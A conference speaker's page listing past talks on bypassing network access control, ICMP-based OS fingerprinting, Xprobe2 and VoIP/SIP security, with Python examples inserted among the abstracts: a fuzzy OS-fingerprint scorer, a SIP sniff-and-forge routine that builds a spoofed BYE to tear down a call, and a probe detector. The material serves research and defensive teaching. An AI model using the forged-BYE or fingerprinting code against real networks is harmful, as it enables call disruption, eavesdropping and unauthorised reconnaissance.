Past Conferences

Defcon 15
August 3-5, 2007
Las Vegas, NV
http://www.defcon.org
Topic: kNAC!

Download: Available [~2.5mb]

2007 GFIRST National Conference
June 25-29, 2007
Orlando, Florida
http://www.us-cert.gov/GFIRST/
Topic: Bypassing NAC (II)

Download: Available [~2.5mb]

ShmooCon 07
March 23 – 25, 2007
Washington, D.C.
http://www.shmoocon.org
Topic: Bypassing NAC Part II

Download: Available [~3.6mb]

EUSecWest 2007
March 1 – March 2
London, England
http://www.eusecwest.com
Topic: Bypassing Network Access Control (NAC) Systems

Download: Available [~3.6mb]

Blackhat Federal 2007
February 28 – March 1
Washington, D.C., USA
http://www.blackhat.com/html/bh-dc-07/bh-dc-07-index.html
Topic: Bypassing Network Access Control (NAC) Systems

Observatoire de la Sécurité des Systèmes d’Information et des Réseaux (OSSIR)
February 5, 2007
Paris, France
http://www.ossir.fr/windows/calendrier/index2006-2007.shtml
Topic: Bypassing Network Access Control (NAC) Systems

Black Hat USA 2006 Briefings and Training
August 2-3, 2006
Caesars Palace, Las Vegas, USA
http://www.blackhat.com/

Topic: Bypassing Network Access Control Systems (NAC)

Download: Download Presentation [~1.5mb]

The threat of viruses, worms, information theft and lack of control of the IT infrastructure lead companies to implement security solutions to control the access to their internal IT networks.

A new breed of software (Sygate, Microsoft, etc.) and hardware (Cisco, Vernier Networks, etc.) solutions from a variety of vendors has emerged recently. All are tasked with one goal: controlling access to a network, using different methods and solutions.

This presentation examines the different strategies used to provide network access control.

Flaws associated with each and every NAC solution presented will be described. These flaws allow the complete bypass of each and every network access control mechanism currently offered on the market.

IT Defense
February 1-3, 2006
Dresden, Germany
http://www.it-defense.de/

Topic: Next Generation Infrastructure Discovery

Download: Not Available

An enterprise IT infrastructure is a complex and dynamic environment that its IT managers often describe as a black hole. Knowledge of an enterprise network’s layout (topology), resources (availability and usage), and the elements residing on it (devices, applications, their properties and the interdependencies among them), together with the ability to keep that knowledge up to date, are all critical for managing and securing IT assets and resources.

Unfortunately, the currently available network discovery technologies (active and passive network discovery) suffer from numerous technological weaknesses that prevent them from providing complete and accurate information about an enterprise IT infrastructure. Their ability to keep track of changes is unsatisfactory at best.

The inability to “know” the network directly results in the inability to manage and secure it appropriately: it is impossible to manage or defend something, or to defend against something, whose existence is unknown or about which only partial information exists.

The first part of the talk presents the currently available network discovery technologies, active and passive network discovery, and explains their strengths and weaknesses. It highlights technological barriers that open source and commercial applications built on these technologies cannot overcome.

The second part of the talk presents a new hybrid approach for infrastructure discovery, monitoring and control. This agent-less approach provides real-time, complete, granular and accurate information about an enterprise infrastructure. Its underlying technology keeps that information current in real time and makes accurate, complete and granular network context available to other network and security applications.

During the talk new technological advancements in the fields of infrastructure discovery, monitoring and auditing will be presented.

Defcon 13
July 29-31, 2005
Alexis Park, Las Vegas, USA
http://www.defcon.org/

Topic: On the Current State of Remote Active OS Fingerprinting

Download Presentation [~660kb]

Active operating system fingerprinting is a technique that uses stimulus (sends packets) to provoke a reaction from network elements. An active scanner monitors the network for a response (or the absence of one) from the probed network elements and, from the type of response and the conclusions drawn from it (part of the implementation’s intelligence), gathers knowledge about the underlying operating system.

This talk examines the current state of remote active OS fingerprinting technology and tools: the different methods used today, the issues associated with them, the limitations, where the current technology is, what can and cannot be accomplished, and what should be done in the future.

The talk also highlights the accuracy of several active operating system fingerprinting tools, analyzes them and compares them.

During the talk a new version of Xprobe2, a remote active OS fingerprinting tool will be released.

Black Hat USA 2005 Briefings and Training
July 27-28, 2005
Caesars Palace, Las Vegas, USA
http://www.blackhat.com/

Topic: A New Hybrid Approach for Infrastructure Discovery, Monitoring and Control

An enterprise IT infrastructure is a complex and dynamic environment that its IT managers often describe as a black hole. Knowledge of an enterprise network’s layout (topology), resources (availability and usage), and the elements residing on it (devices, applications, their properties and the interdependencies among them), together with the ability to keep that knowledge up to date, are all critical for managing and securing IT assets and resources.

Unfortunately, the currently available network discovery technologies (active and passive network discovery) suffer from numerous technological weaknesses that prevent them from providing complete and accurate information about an enterprise IT infrastructure. Their ability to keep track of changes is unsatisfactory at best.

The inability to “know” the network directly results in the inability to manage and secure it appropriately: it is impossible to manage or defend something, or to defend against something, whose existence is unknown or about which only partial information exists.

The first part of the talk presents the currently available network discovery technologies, active and passive network discovery, and explains their strengths and weaknesses. It highlights technological barriers that open source and commercial applications built on these technologies cannot overcome.

The second part of the talk presents a new hybrid approach for infrastructure discovery, monitoring and control. This agent-less approach provides real-time, complete, granular and accurate information about an enterprise infrastructure. Its underlying technology keeps that information current in real time and makes accurate, complete and granular network context available to other network and security applications.

During the talk new technological advancements in the fields of infrastructure discovery, monitoring and auditing will be presented.

CSI NetSec 2005
June 13-15, 2005
The Phoenician, Scottsdale, Arizona, USA
http://www.gocsi.com/netsec/

Topic: Next Generation Infrastructure Discovery, Monitoring, and Auditing

IT Underground
February 17-18, 2005.
Prague Conference Center, Prague, Czech Republic.

Topic: On the accuracy of active OS fingerprinting tools

Download: Download Presentation [~495kb]

Active operating system fingerprinting is a technique that uses stimulus (sends packets) to provoke a reaction from network elements. An active scanner monitors the network for a response (or the absence of one) from the probed network elements and, from the type of response and the conclusions drawn from it (part of the implementation’s intelligence), gathers knowledge about the underlying operating system.

The talk also highlights the accuracy of several active operating system fingerprinting tools, analyzes them and compares them.

AusCERT 2004
May 23-27, 2004.
Royal Pines Resort, Gold Coast, Australia.

Topic: Why E.T. Can’t Phone Home? – Security Risk Factors with IP Telephony

Download: Download Presentation [~600kb]

“…it is no longer necessary to have a separate network for voice…”

IP Telephony based networks, which will be a core part of our Telephony infrastructure in the future, introduce caveats and security concerns which traditional telephony based networks do not have to deal with, have long forgotten about, or have learned to cope with. The security risk is usually overshadowed by the technological hype and the way IP Telephony equipment manufacturers push the technology to the masses. The presentation highlights the different security risk factors with IP Telephony based networks.

Among the issues we will be examining are free phone calls, call hijacks, call tracking, manipulation of conversations, fraud (and detection) and other interesting topics.

Black Hat Federal
October 1-2, 2003.
The Sheraton Premiere at Tyson’s Corner, Virginia, USA.

Topic: Using Xprobe2 in a Corporate Environment

Download: Download Presentation [~600kb]

Xprobe2 is a remote active operating system fingerprinting tool with a different approach to operating system fingerprinting.

The latest version of Xprobe2 was released at Black Hat USA 2003.

The talk presents the way Xprobe2 operates, its usage scenarios, and how Xprobe2 overcomes several issues affecting active operating system fingerprinting.

The talk presents the issues affecting traditional active operating system fingerprinting and how these issues directly affect the results that different active operating system fingerprinting tools relying on these methods produce.

New advancements in the field of active operating system fingerprinting, which greatly enhance the accuracy of Xprobe2, will also be presented.

Examples and usage scenarios will be discussed. The main emphasis will be on how to benefit the most from using Xprobe2, and how to perform corporate wide network auditing using Xprobe2.

The talk will explain why accurate operating system fingerprinting is an extremely important stage in auditing and in nearly any network security related process.

Finally, Xprobe2’s future development plan will be discussed.

Black Hat USA 2003 Briefings
July 28-31, 2003.
Caesars Palace, Las Vegas, Nevada, USA.

Topic: Revolutionizing Operating System Fingerprinting

Download: Power Point Presentation [~3.3mb]

Xprobe is an active operating system fingerprinting tool which was officially released two years ago at the Black Hat Briefings USA 2001. The first version of the tool was a proof of concept for the methods introduced in the “ICMP Usage in Scanning” project, which I conducted. Two years and several versions later (mainly the Xprobe2 v0.1 release), this talk examines several issues with operating system fingerprinting that we (Fyodor Yarochkin and myself) encountered during the development of Xprobe and Xprobe2.

Mainly, the talk explains why traditional operating system fingerprinting methods suffer from a number of caveats, and how these issues directly affect the results produced by the different operating system fingerprinting tools relying on these methods (these issues will be explained along with different examples).

During the talk I will introduce several advancements in the field of operating system fingerprinting. The methods introduced greatly enhance the accuracy of operating system fingerprinting. Several new ways to gather information about a host OS will be uncovered along with ways to overcome many of the current issues of active operating system fingerprinting methods.

During the talk examples will be given, and the audience will be encouraged to participate in a discussion.

A paper release and a new version of Xprobe2 will accompany the talk.

Defcon XI
August 1st-3rd, 2003.
Alexis Park, Las Vegas, Nevada, USA.

Topic: Revolutionizing Operating System Fingerprinting

Download: Power Point Presentation [~3.3mb]

Xprobe is an active operating system fingerprinting tool which was officially released two years ago at the Black Hat Briefings USA 2001. The first version of the tool was a proof of concept for the methods introduced in the “ICMP Usage in Scanning” project, which I conducted. Two years and several versions later (mainly the Xprobe2 v0.1 release), this talk examines several issues with operating system fingerprinting that we (Fyodor Yarochkin and myself) encountered during the development of Xprobe and Xprobe2.

Mainly, the talk explains why traditional operating system fingerprinting methods suffer from a number of caveats, and how these issues directly affect the results produced by the different operating system fingerprinting tools relying on these methods (these issues will be explained along with different examples).

During the talk I will introduce several advancements in the field of operating system fingerprinting. The methods introduced greatly enhance the accuracy of operating system fingerprinting. Several new ways to gather information about a host OS will be uncovered along with ways to overcome many of the current issues of active operating system fingerprinting methods.

During the talk examples will be given, and the audience will be encouraged to participate in a discussion.

A paper release and a new version of Xprobe2 will accompany the talk.

Hivercon
November 26-27, 2002.
The Burlington Hotel, Dublin, Ireland.

Topic: Why E.T. Can’t Phone Home? – Security Risk Factors with IP Telephony-based Networks

Download: Power Point Presentation [~520kb]

IP Telephony based networks, which might be a core part of our Telephony infrastructure in the near future, introduce caveats and security concerns which traditional telephony based networks do not have to deal with, have long forgotten about, or have learned to cope with. The security risk is usually overshadowed by the technological hype and the way IP Telephony equipment manufacturers push the technology to the masses. The presentation highlights the different security risk factors with IP Telephony based networks.

Defcon X
August 2nd – August 4th, 2002.
Alexis Park Hotel and Resort in Las Vegas, Nevada, USA.

Topic: Xprobe, The Year After

Download: Power Point Presentation [~5mb]

Xprobe, written and maintained by Fyodor Yarochkin & Ofir Arkin, is an active operating system fingerprinting tool based on Ofir Arkin’s “ICMP Usage in Scanning” research project (http://www.sys-security.com). Last year, at the Black Hat Briefings in July 2001, the first generation of Xprobe was released.

The tool’s first generation (Xprobe v0.0.1) relies on a hard-coded, static logic tree. Although it has a lot of advantages (1-4 packets only, accurate, fast, efficient, etc.), the tool suffers from a major drawback: its logic is static.

At Defcon 10 we will be releasing Xprobe2, a completely rewritten active operating system fingerprinting tool with a different approach to operating system fingerprinting. Xprobe2 relies on fuzzy signature matching, probabilistic guesses, multiple simultaneous matches, and a signature database.

As with the previous year: don’t miss the demonstration!
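The fuzzy matching idea behind Xprobe2, as an added Python illustration for this page (not Xprobe2’s own code). The signature table, the weights and the probe observations are all constructed; the attribute values are simplified and only loosely follow well-known stack behaviour (TTL 64/128/255, whether a non-zero ICMP code is echoed, how much of the datagram a port-unreachable quotes). Each probe module votes for or against every candidate OS on its own, an unanswered probe simply abstains, and the ranked total is the guess:

```python
"""Xprobe2-style fuzzy OS matching over ICMP probe results.

Added illustrative example, not Xprobe2 source. The signature table, the
weights and the probe observations are all constructed here; the attribute
values are simplified and only loosely follow well-known stack behaviour.
"""
from collections import defaultdict

# Constructed signature database: for each stack, the value each probe is
# expected to produce. A missing attribute means "not known for this OS"
# and neither rewards nor penalises the candidate.
SIGNATURES = {
    "Linux 2.4": {
        "echo_reply_ttl": 64,
        "echo_code_echoed": True,        # non-zero code comes back in the reply
        "timestamp_reply": True,
        "addrmask_reply": False,
        "unreach_quoted_bytes": "full",  # port unreachable quotes whole datagram
        "unreach_ttl": 64,
    },
    "Windows 2000": {
        "echo_reply_ttl": 128,
        "echo_code_echoed": False,       # code zeroed in the reply
        "timestamp_reply": False,
        "addrmask_reply": False,
        "unreach_quoted_bytes": "8",     # IP header + 8 bytes only
        "unreach_ttl": 128,
    },
    "Solaris 8": {
        "echo_reply_ttl": 255,
        "echo_code_echoed": True,
        "timestamp_reply": True,
        "addrmask_reply": True,
        "unreach_quoted_bytes": "8",
        "unreach_ttl": 255,
    },
}

# Weight per probe module: a TTL is less distinctive than how the stack
# treats the ICMP code field or how much of the datagram it quotes.
WEIGHTS = {"echo_reply_ttl": 1, "echo_code_echoed": 2, "timestamp_reply": 2,
           "addrmask_reply": 2, "unreach_quoted_bytes": 3, "unreach_ttl": 1}

def initial_ttl(observed_ttl):
    """Round a TTL seen on the wire up to the nearest common initial value:
    the reply lost one per hop, so 57 most likely started life as 64."""
    for candidate in (32, 64, 128, 255):
        if observed_ttl <= candidate:
            return candidate
    return 255

def normalize(observed):
    """Apply the TTL heuristic to the raw observations; None (no answer,
    probably filtered) is passed through untouched."""
    out = dict(observed)
    for attr in ("echo_reply_ttl", "unreach_ttl"):
        if out.get(attr) is not None:
            out[attr] = initial_ttl(out[attr])
    return out

def score(observed, signatures=SIGNATURES, weights=WEIGHTS):
    """Rank candidate operating systems best-first as (name, score) pairs.

    Every answered probe votes for or against each candidate; a probe with
    no answer is skipped, so a firewall dropping some probe types lowers
    confidence instead of derailing the whole match.
    """
    totals = defaultdict(int)
    for os_name, sig in signatures.items():
        totals[os_name] = 0
        for attr, value in observed.items():
            if value is None or attr not in sig:
                continue
            totals[os_name] += weights[attr] if sig[attr] == value else -weights[attr]
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)

if __name__ == "__main__":
    # Constructed observation: echo, timestamp and port-unreachable probes
    # answered (TTL 57 on the wire); the address-mask request was filtered.
    raw = {"echo_reply_ttl": 57, "echo_code_echoed": True,
           "timestamp_reply": True, "addrmask_reply": None,
           "unreach_quoted_bytes": "full", "unreach_ttl": 57}
    for name, s in score(normalize(raw)):
        print(f"{name:14} {s:+d}")
```

Compared with a static decision tree, a filtered probe here only removes one vote instead of stopping the decision, and a stack that agrees on five attributes out of six still ranks first. The price is that the answer is a ranking with scores rather than a single yes or no, which is what a probabilistic guess means in practice.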

Black Hat Briefings USA 2002
July 31 – August 1, 2002.
Caesars Palace, Las Vegas, NV, USA.

Topic: E.T. Can’t Phone Home – VoIP Security

Download: Power Point Presentation [~9.5mb]

“…it is no longer necessary to have a separate network for voice…”

Voice over IP (VoIP) is the next generation of telecommunications. It is composed of signaling protocols (which establish, modify and tear down sessions), media transfer protocols (which carry the voice samples), and supporting protocols (which provide the other two with services they need, such as routing, DNS, etc.).

Security issues with VoIP protocols are less highlighted than the hype about the technology. This talk focuses on the security issues of the Session Initiation Protocol (SIP), a signaling protocol that is the main rival to H.323, and of the Real-Time Transport Protocol (RTP), the most common vessel for carrying voice samples.

The presentation highlights ways to take advantage of the design of these protocols. The talk also examines ways to bypass any element in a SIP-based VoIP architecture. Among the issues we will be examining are free phone calls, call hijacks, call tracking, manipulation of conversations, fraud (and its detection) and other gizmos.

Black Hat Briefings USA 2002 – Training
July 30, 2002.
Caesars Palace, Las Vegas, NV, USA.
Topic: Advanced Scanning Techniques with ICMP

ICMP (or, by its full name, the Internet Control Message Protocol) looks harmless at first glance. In terms of security, ICMP is one of the most controversial protocols within the TCP/IP protocol suite.

This workshop will be an in-depth theoretical and hands-on experience with the stepbrother of TCP and UDP, the ICMP protocol, and its usage in scanning. Scanning will be only a portion of this workshop…

Part One: ICMP protocol basics.

We will cover how messages differ from one another, where we expect to see them on a network and, most importantly, when: the circumstances in which each ICMP message is generated (for ICMP error messages we will explain the different triggers for their generation and which network problems contribute to each one of them), and the security problems associated with each and every ICMP message.

We will be covering security related topics such as:

  • Denial of Service
  • Spoofing
  • Covert Channels
  • Traffic Abnormalities (we will learn how to differentiate between legitimate and non-legitimate traffic)
  • Profiling Traffic and more.

Many of the TCP/IP protocol suite’s networking phenomena will also be explored, including host, server and router behaviors that people may experience in the day-to-day operation of their networks, both from the networking standpoint (routers and switches) and from the security standpoint (IDS, firewalls, etc.).

Part Two: The usage of ICMP for active scanning.

This section will begin with some basic Host Detection methods and will illustrate unique situations where ICMP error messages will help a malicious party. This will include a demonstration of Host-based security methods with several operating systems, and will illustrate why some of the OSs do not provide the user with enough tools to achieve a complete Host-based security solution.

There will be more in-depth explanations and demonstrations of Advanced Host Detection methods that aim to use traffic that will trigger ICMP error messages back from a probed machine/IP range. Some of the methods allow the detection of filtering mechanisms as well as access control lists (ACL) schemes. Also included is a demonstration on how some Firewalls fail to block packets with mangled values inside the IP Header and how these packets help us in detecting certain hosts behind a protecting firewall.

We will cover methods that take advantage of router (and layer 3 aware switch) functionality and aid a malicious party in mapping a network.

Active operating system fingerprinting methods using the ICMP protocol will be examined and explained. The methods, discovered by the ICMP Project, allow a malicious party, as well as an auditor or an administrator, to accurately identify the flavor of an operating system using a very low number of packets (usually one). Uses of active operating system fingerprinting include auditing your networks for unauthorized operating system installations.

For example, we will explore methods that will allow us to identify and differentiate between all of the different Microsoft based operating system flavors.

We will focus on our ability to combine several active operating system fingerprinting methods together so a better, faster, and more accurate process of active system fingerprinting will be in our auditing tools set.

Part Three: Ways to identify the different methods of active operating systems fingerprinting using the ICMP protocol with the help of Snort, a free IDS utility. An explanation of Snort will be given, as well as how to write a rule base for this awesome IDS open source utility.

Part Four: Passive operating system fingerprinting using the ICMP protocol.

We will go through the basics of passive fingerprinting and what power it gives to those who use it. We will explore the types of information one might glean from a network (application wise, operating system identification wise, etc). We will be looking at a demonstration of the Microsoft way of implementing ICMP within their different operating systems and how this helps us to passively differentiate between them all.

Part Five: Ways to build a proper firewall rule base and mechanisms to prevent most of the methods introduced in the workshop.

Part Six: Examining the subject of traffic profiling and ways we can use it to enhance our overall network security (not only regarding ICMP).

The students will be given the newest version of the ICMP Usage in Scanning research paper, version 4.0, which will be released at the Black Hat Briefings, as well as a CD ROM containing all tools and papers discussed during the training.

CanSecWest/Core02
May 1-3, 2002.
Sheraton Wall Centre, Vancouver B.C., Canada.
Topic: VoIP – The Next Generation of Phreaking

Download: Power Point Presentation

Security issues with VoIP protocols are less highlighted than the hype about the technology. This talk focuses on the security issues of the Session Initiation Protocol (SIP), a signaling protocol that is the main rival to H.323, and of the Real-Time Transport Protocol (RTP), the most common vessel for carrying voice samples.

Some of the issues I will be covering are free phone calls, call hijacks, call tracking, manipulation of conversations, etc.
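Two of the items listed here and in the Black Hat USA 2002 talk above, call tracking and call teardown/hijack, follow directly from the design of SIP. As an added Python example for this page (not code from either talk), the following reconstructs a SIP dialog and both parties’ RTP endpoints from a constructed INVITE/200 OK exchange, then builds an in-dialog BYE that the callee’s dialog-matching rule accepts. Names, addresses (RFC 5737 ranges), tags and Call-ID are made up, and the parser is deliberately minimal:

```python
"""Rebuilding a SIP dialog and both RTP endpoints from sniffed signaling, then
forging an in-dialog BYE the callee cannot tell from the caller's own.

Added example for this page, not code from the talks. Both messages are
constructed (RFC 5737 addresses) and the parser is minimal: no header
folding, no compact header names, no multipart bodies.
"""
import re
from dataclasses import dataclass, field

@dataclass
class SipMessage:
    start_line: str
    headers: dict = field(default_factory=dict)  # lower-case name -> [values]
    body: str = ""

    def get(self, name):
        values = self.headers.get(name.lower())
        return values[0] if values else None

def parse_sip(raw):
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    msg = SipMessage(start_line=lines[0], body=body)
    for line in lines[1:]:
        name, _, value = line.partition(":")
        msg.headers.setdefault(name.strip().lower(), []).append(value.strip())
    return msg

TAG_RE = re.compile(r";tag=([^;\s>]+)")

def tag_of(header_value):
    m = TAG_RE.search(header_value or "")
    return m.group(1) if m else None

def cseq_number(msg):
    return int(msg.get("CSeq").split()[0])

def media_endpoint(msg):
    """SDP c= address and audio m= port: where this party expects RTP, which
    is all a sniffer on the path needs to record or inject media."""
    addr = port = None
    for line in msg.body.splitlines():
        if line.startswith("c=IN IP4 "):
            addr = line.split()[-1]
        elif line.startswith("m=audio "):
            port = int(line.split()[1])
    return addr, port

@dataclass
class Dialog:
    """Dialog state as the callee's UA keeps it (RFC 3261 section 12)."""
    call_id: str
    local_header: str   # our To header, carrying our tag
    remote_header: str  # their From header, carrying their tag
    remote_cseq: int

def dialog_at_callee(invite, ok):
    return Dialog(invite.get("Call-ID"), ok.get("To"), invite.get("From"),
                  cseq_number(invite))

def matches_dialog(dialog, msg):
    """The rule a UAS applies to bind an in-dialog request to a dialog. None
    of it is secret: Call-ID and both tags crossed the wire in cleartext, and
    the CSeq only has to be higher than the last one seen."""
    return (msg.get("Call-ID") == dialog.call_id
            and tag_of(msg.get("From")) == tag_of(dialog.remote_header)
            and tag_of(msg.get("To")) == tag_of(dialog.local_header)
            and cseq_number(msg) > dialog.remote_cseq)

def forge_bye(dialog, request_uri, via_host):
    """A BYE impersonating the caller, built from sniffed values only."""
    return ("BYE %s SIP/2.0\r\nVia: SIP/2.0/UDP %s;branch=z9hG4bKforged\r\n"
            "From: %s\r\nTo: %s\r\nCall-ID: %s\r\nCSeq: %d BYE\r\n"
            "Content-Length: 0\r\n\r\n"
            % (request_uri, via_host, dialog.remote_header,
               dialog.local_header, dialog.call_id, dialog.remote_cseq + 1))

# Constructed capture: Alice (192.0.2.10) calls Bob (192.0.2.20).
INVITE = ("INVITE sip:bob@example.org SIP/2.0\r\n"
          "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
          "From: Alice <sip:alice@example.org>;tag=1928301774\r\n"
          "To: Bob <sip:bob@example.org>\r\n"
          "Call-ID: a84b4c76e66710@192.0.2.10\r\nCSeq: 314159 INVITE\r\n"
          "Contact: <sip:alice@192.0.2.10>\r\nContent-Type: application/sdp\r\n"
          "\r\nv=0\r\no=alice 2890844526 2890844526 IN IP4 192.0.2.10\r\n"
          "s=-\r\nc=IN IP4 192.0.2.10\r\nt=0 0\r\nm=audio 49170 RTP/AVP 0\r\n")
OK200 = ("SIP/2.0 200 OK\r\n"
         "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
         "From: Alice <sip:alice@example.org>;tag=1928301774\r\n"
         "To: Bob <sip:bob@example.org>;tag=a6c85cf\r\n"
         "Call-ID: a84b4c76e66710@192.0.2.10\r\nCSeq: 314159 INVITE\r\n"
         "Contact: <sip:bob@192.0.2.20>\r\nContent-Type: application/sdp\r\n"
         "\r\nv=0\r\no=bob 2890844527 2890844527 IN IP4 192.0.2.20\r\n"
         "s=-\r\nc=IN IP4 192.0.2.20\r\nt=0 0\r\nm=audio 3456 RTP/AVP 0\r\n")

def demo():
    invite, ok = parse_sip(INVITE), parse_sip(OK200)
    bob = dialog_at_callee(invite, ok)
    bye = parse_sip(forge_bye(bob, "sip:bob@192.0.2.20", "192.0.2.10:5060"))
    return {"caller_rtp": media_endpoint(invite),
            "callee_rtp": media_endpoint(ok),
            "forged_bye_accepted": matches_dialog(bob, bye)}

if __name__ == "__main__":
    print(demo())
```

The call-tracking half is `media_endpoint`: the SDP tells anyone on the path which address and port carry each direction of RTP. The teardown half is `matches_dialog`: with signaling on cleartext UDP and no authentication of in-dialog requests, the forged BYE is accepted because every value the rule checks was already visible, and a re-INVITE carrying a different c= address is the same trick aimed at the media path instead. Carrying signaling over TLS, protecting media with SRTP, and challenging in-dialog requests (Digest) rather than only the initial INVITE or REGISTER are what take those inputs away from the attacker.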

The Black Hat Windows Security 2002 Briefings
February 7-8, 2002.
Radisson Hotel New Orleans, New Orleans, LA, USA.

Topic: VoIP – The Next Generation of Phreaking

Download: Not Available

Welcome to the next generation of security hazards and problems inherited from the use of one network for both data and voice. Welcome to the world of IP based telephony (and Internet telephony), which not only provides exciting new technologies but also a new challenge for the security community: securing these networks.

Along with new technologies come their security problems. Some are inherited from the use of IP based networks, some (new) result from design flaws and from the complexity of the protocols and their implementations, and some result from the combination of both worlds, telephony and IP.

This talk will also examine several deployment scenarios for VoIP from several architectural angles: the Internet, a corporation, an ITSP, and a telecom company. For each scenario the security problems will be highlighted and security design tips will be given.

The Black Hat Windows Security 2002 Briefings – Training
February 5-6, 2002.
Radisson Hotel New Orleans, New Orleans, LA, USA.
Topic: Advanced Scanning Techniques with ICMP

The Black Hat Briefings Europe 2001
November 21-22, 2001.
Golden Tulip Grand – The Krasnapolsky, Amsterdam, The Netherlands.

Topic: X – Remote ICMP Based OS Fingerprinting Techniques

X is a logic which combines the various remote active operating system fingerprinting methods using the ICMP protocol, discovered during the “ICMP Usage in Scanning” research project, into a simple, fast, efficient and powerful way to detect the underlying operating system a targeted host is using.

Xprobe, written and maintained by Fyodor Yarochkin (fygrave@tigerteam.net) and Ofir Arkin (ofir@sys-security.com), is a tool that automates X.

I will be explaining the tool’s inner workings and the various active OS fingerprinting methods with the ICMP protocol implemented and used by the tool. I will demonstrate the tool’s abilities, its advantages, and future plans. I will also cover the enhancements made to the tool since its launch (Black Hat Briefings ’01, July 2001).

The tool’s limitations, ways to detect its usage, and how to defend ourselves from its abilities will also be discussed. Future plans and enhancements, which include a different approach to OS detection, will also be presented.

The Black Hat Briefings Europe 2001 – Training
November 19-20, 2001.
Golden Tulip Grand – The Krasnapolsky, Amsterdam, The Netherlands.

Topic: Advanced Scanning Techniques with ICMP

The Internet Control Message Protocol (ICMP) may seem harmless at first glance. In terms of security, ICMP is one of the most controversial protocols in the TCP/IP protocol suite.

This workshop will be an in-depth theoretical and hands-on experience with the ICMP protocol and its usage in scanning.

We will start by explaining the protocol’s basics and characteristics. We will explain the circumstances in which each ICMP message is generated and, for ICMP error messages, what triggered them. We will explain where and why to expect to see ICMP messages, and in which segments of your network. We will go over the security hazards (such as DoS, covert channels and more) of each ICMP message. This part of the training explains a lot of TCP/IP networking phenomena.

We will explain some basic host detection methods. We will not only concentrate on ICMP query messages; we will also examine some unique situations where a simple ICMP error message carries more than enough information for a malicious computer attacker.

We will cover host-based security methods and explain why these measures are not enough. Next we will overview methods which aim to trigger ICMP error messages back from the probed IP addresses. Some of these advanced host detection methods allow us to detect the presence of a filtering device, and even to learn and understand the ACL scheme a filtering device enforces on a protected network. We will also learn why, in some cases, firewalls fail to notice that values inside the IP header were mangled. We will have a live demonstration with one of the leading firewall products on the market today. Methods which take advantage of router functionality, and aid a prober in unique circumstances, will also be examined.

Active operating system fingerprinting methods using the ICMP protocol, discovered by the ICMP project, will be examined and explained. We will examine the methods that allow us to clearly identify a flavor of an operating system. We will demonstrate methods that will allow us to fingerprint and differentiate between Linux, Sun Solaris, Microsoft (all flavors), HPUX, AIX, FreeBSD, Ultrix, and other OSs based machines. For example, we will demonstrate how we can differentiate between all the different flavors of Microsoft based operating systems. We will be using a set of tools to generate the queries and examine the different behavioral patterns we produce from the servers in the class. We will focus on our ability to combine everything together, and how this makes the process of operating system identification and fingerprinting more efficient and simple (even better than common methods being used in the computer security field today).

We will learn ways to identify the different methods of active OS fingerprinting using the ICMP protocol with the help of Snort, a free IDS utility.

The subject of Passive Fingerprinting using the ICMP protocol will be explained and demonstrated. We will examine the Microsoft way of implementing the ICMP protocol and how this helps us to fingerprint all of the Microsoft based operating systems passively. We will also explain how to build a proper firewall rule base that might handle most of the methods introduced.
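The workshop above, like Part Three of the Black Hat USA 2002 training, covers writing Snort rules to spot these probes. As an added example for this page, written in Python rather than in Snort’s rule language and not material from either training, the following inspects raw IPv4 packets and raises the same kind of alerts a rule set would: echo requests with a non-zero code, with TOS bits set or with DF set (the echo-based fingerprinting probes), the rarely seen timestamp, information and address mask queries (host detection), and a packet whose IP header length field is impossible (the mangled-header trick from Part Two). The packets are constructed in-line; everything else is standard library:

```python
"""Flagging the ICMP probes described in the workshop, the way a Snort rule
set would, by inspecting raw IPv4 packets.

Added example, not material from the training and not the ICMP project's
Snort rules. All packets are constructed in-line; the checks test header
fields only (no checksum verification, no thresholds or rate logic).
"""
import struct

ICMP_NAMES = {13: "timestamp request", 15: "information request",
              17: "address mask request"}

def checksum(data):
    """RFC 1071 ones' complement sum, used for the IP and ICMP headers."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_icmp(icmp_type, code, rest=b"\0\0\0\0", data=b""):
    """ICMP header (type, code, checksum, 4 'rest of header' bytes) + data."""
    msg = struct.pack("!BBH", icmp_type, code, 0) + rest + data
    return msg[:2] + struct.pack("!H", checksum(msg)) + msg[4:]

def build_ipv4(payload, src="192.0.2.99", dst="192.0.2.1", tos=0, ttl=64,
               df=False, ihl=5, proto=1):
    """Minimal IPv4 header. `ihl` is written verbatim so a bogus value can be
    produced on purpose (the 'mangled IP header' host-detection trick)."""
    flags_frag = 0x4000 if df else 0
    hdr = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, tos, 20 + len(payload),
                      0x1234, flags_frag, ttl, proto, 0,
                      bytes(int(o) for o in src.split(".")),
                      bytes(int(o) for o in dst.split(".")))
    hdr = hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]
    return hdr + payload

def inspect_packet(pkt):
    """Return the alert strings one packet raises (empty list: nothing fired)."""
    alerts = []
    if len(pkt) < 20:
        return ["truncated IP packet"]
    ver_ihl, tos = pkt[0], pkt[1]
    ihl = (ver_ihl & 0x0F) * 4
    flags_frag = struct.unpack("!H", pkt[6:8])[0]
    proto = pkt[9]
    if (ver_ihl >> 4) != 4 or ihl < 20 or ihl > len(pkt):
        # An impossible header length is a classic way to draw an ICMP
        # Parameter Problem from a live host behind a careless filter.
        return ["mangled IP header (IHL=%d bytes)" % ihl]
    if proto != 1 or len(pkt) < ihl + 4:
        return alerts
    icmp_type, icmp_code = pkt[ihl], pkt[ihl + 1]
    if icmp_type == 8:                      # echo request
        if icmp_code != 0:
            alerts.append("echo request with non-zero code %d "
                          "(code-echo fingerprint probe)" % icmp_code)
        if tos != 0:
            alerts.append("echo request with TOS 0x%02x "
                          "(TOS-echo fingerprint probe)" % tos)
        if flags_frag & 0x4000:
            # Noisy on its own: path-MTU discovery pings also set DF.
            alerts.append("echo request with DF set (DF-echo fingerprint probe)")
    elif icmp_type in ICMP_NAMES:
        alerts.append("ICMP %s (host detection / fingerprint probe)"
                      % ICMP_NAMES[icmp_type])
    return alerts

def run(packets):
    """Index of every packet that tripped a rule -> its alerts."""
    hits = {}
    for i, pkt in enumerate(packets):
        alerts = inspect_packet(pkt)
        if alerts:
            hits[i] = alerts
    return hits

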